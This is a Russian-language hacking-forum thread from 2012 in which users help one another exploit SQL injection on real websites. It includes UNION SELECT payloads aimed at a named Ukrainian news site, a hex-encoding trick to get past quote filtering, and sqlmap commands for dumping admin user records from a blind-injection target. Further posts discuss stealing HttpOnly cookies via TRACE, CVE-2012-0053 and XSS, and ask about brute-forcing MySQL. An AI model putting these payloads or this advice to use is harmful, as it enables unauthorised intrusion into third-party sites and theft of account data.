ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.06.2012, 02:00
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
Сообщение от LelouchMe
LelouchMe said:
Подставил правильное имя таблицы - запрос матерится - не пойму на что... http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM %20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME =aadm_users+LIMIT+0,1+--+
на тебя он матерится!
/thread43966.html
|
|
|

28.06.2012, 02:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 6667
Репутация:
0
|
|
Сообщение от d1v
d1v said:
на тебя он матерится!
/thread43966.html
Всё сделал как там, и?
|
|
|
|

28.06.2012, 02:08
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
Сообщение от LelouchMe
LelouchMe said:
Всё сделал как там, и?
не лги мне. читай заново.
|
|
|

28.06.2012, 02:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 6667
Репутация:
0
|
|
Сообщение от d1v
d1v said:
не лги мне. читай заново.
да кавычки видно фильтрует вот и всё...(
|
|
|
|

28.06.2012, 02:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 183267
Репутация:
84
|
|
Сообщение от LelouchMe
LelouchMe said:
Всё сделал как там, и?
Таблицу захекси
Код:
Code:
http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=0x6161646d5f7573657273+LIMIT+0,1+--+
|
|
|
|

28.06.2012, 14:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 14192
Репутация:
0
|
|
Вопрос по склмап.
Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.
Иньекция:
Код:
Code:
---
Place: GET
Parameter: rec
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: rec=83990 AND SLEEP(5)
---
Пытаюсь получить хоть что-то из бд:
Код:
Code:
./sqlmap.py --url=адрес --sql-query="SELECT name FROM db_name.dle_users;"
Вывод:
Код:
Code:
[09:27:24] [WARNING] the SQL query provided does not return any output
[09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
SELECT name FROM db_name.dle_users;: None
Любые попытки получить информация заканчиваются именно так.
Один раз был такой вывод:
Код:
Code:
SELECT user_id FROM db_name.dle_users; [4]:[*] B[*] [*] ![*] A
Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.
|
|
|
|

28.06.2012, 15:06
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
to Dmit3Y
Код:
Code:
-u "http://site.com/" --dump -D db_name -T dle_users -C name --start 1 --stop 10
|
|
|

28.06.2012, 23:40
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от +toxa+
+toxa+ said:
у нужных тебе куков установлен флаг
HttpOnly
. Проблему решит метод TRACE, но на практике почти не юзается.
Не только TRACE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
Сообщение от None
01/28/2012
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
|
|
|

29.06.2012, 00:00
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
to Dad69
Получение доступа к HttpOnly Cookie через XSS -> Link
|
|
|

29.06.2012, 18:20
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Существует ли локальный mysql брут?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|